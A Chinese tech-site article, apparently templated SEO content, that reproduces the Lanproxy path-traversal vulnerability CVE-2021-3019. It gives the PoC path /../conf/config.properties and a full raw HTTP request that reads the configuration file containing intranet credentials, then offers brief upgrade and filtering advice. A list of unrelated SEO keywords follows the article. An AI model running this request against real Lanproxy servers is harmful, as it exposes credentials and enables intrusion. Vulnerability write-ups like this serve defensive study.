千家信息网

Lanproxy路径遍历漏洞CVE-2021-3019如何理解

发表于:2024-11-12 作者:千家信息网编辑
千家信息网最后更新 2024年11月12日,Lanproxy路径遍历漏洞CVE-2021-3019如何理解,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。Lanproxy 路径遍历漏
千家信息网最后更新 2024年11月12日Lanproxy路径遍历漏洞CVE-2021-3019如何理解

Lanproxy路径遍历漏洞CVE-2021-3019如何理解,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。

Lanproxy 路径遍历漏洞 (CVE-2021-3019)

一、漏洞简介

Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。

二、影响版本

lanproxy 0.1

三、漏洞复现

环境安装移步:

https://www.jianshu.com/p/6482ac354d34

Poc:/../conf/config.properties

GET/../conf/config.propertiesHTTP/1.1Host: 127.0.0.1:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close

读取passwd

curl访问也行

四、安全建议

升级版本,和防火墙做相关路径../跳跃限制。

看完上述内容,你们掌握Lanproxy路径遍历漏洞CVE-2021-3019如何理解的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注行业资讯频道,感谢各位的阅读!

漏洞 路径 内容 方法 更多 版本 问题 支持 安全 束手无策 为此 上层 个人 个人电脑 内部网 凭据 原因 对此 局域 局域网 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 诈骗网络安全手抄报 数据库不能为空的函数怎么输入 联想服务器在哪个位置 我的世界国际版1.18.10服务器 润和软件开发版鸿蒙 怎么下载服务器适用的浏览器 互联网科技十大热点 微信小程序音乐软件开发 上海依度网络技术有限公司 黎明杀机网络连接不上服务器 网络安全教育教学 fdb数据库软件 steamnba2k22连接不上服务器 新华互联网科技公司 公司可以有自己的数据库么 临沂鸿悦网络技术有限公司 腾讯云轻量服务器怎么打开 航空公司网络安全工程师职责 网上挂号系统软件开发源代码 数据库一定要用固态硬盘吗 网络技术代理返点 软件开发拼音怎么写 概括工业网络技术的应用 shopping 数据库 SYTD棋牌软件开发迅游 福州如何做游戏软件开发 研究消费者剩余常用的数据库 清单软件开发 丰南区媒体网络技术售后保障 公司月度网络安全报告
0